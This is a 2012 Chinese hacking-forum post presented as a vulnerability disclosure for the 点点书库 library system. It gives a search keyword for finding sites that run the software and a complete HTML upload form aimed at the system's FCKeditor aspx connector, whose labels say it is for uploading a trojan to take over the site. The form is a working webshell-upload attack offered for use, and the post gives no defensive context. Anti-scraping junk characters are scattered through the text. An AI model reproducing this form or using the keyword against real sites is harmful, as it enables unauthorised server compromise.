找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 7447|回复: 0
打印 上一主题 下一主题

点点书库图书馆系统文件上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-10 21:20:59 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
主题:图书馆系统任意文件上传漏洞& e' U# _# d" j: {% a
作者:冰锋刺客! x0 L, N. M4 `# d) B. p$ v7 D
厂商:点击书(dianjishu.com), w& E, d) v4 i
日期:2012-6-21: x' h1 w6 O) }' k* y

  }0 O9 S9 a! X# [I 概述% R+ z  [' C+ O( y( b
   点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell
4 b$ Q& o6 K! h& P II 简介0 y! m7 b3 s2 [+ b+ z& u; L
   关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"4 D3 J* c% P+ Q- _- A
补充一个漏洞
0 X! ~9 k1 F+ j; W2 S( q  T$ @ <form id="frmUpload" enctype="multipart/form-data"+ L4 Q% i+ J+ m, F
action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>8 o$ S% k$ B" U, P; v( d: u
<input id="btnUpload" type="submit" value="操翻他">
% E7 Z, z# q& g3 Q5 ] </form>; b: O, Y( I* z
你们懂的
! u* f. l, z3 U9 K2 {; y- E  D 那傻逼提供还需要改包.
. X: Q5 r' [+ G7 B. Q2 \4 R! n 自己看了下源代码发现fckeditor2 b1 J' a9 Z4 }- B" u. D. l& X, K2 b
直接秒杀& ?& n6 z- ?6 `' j( t! D% r
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表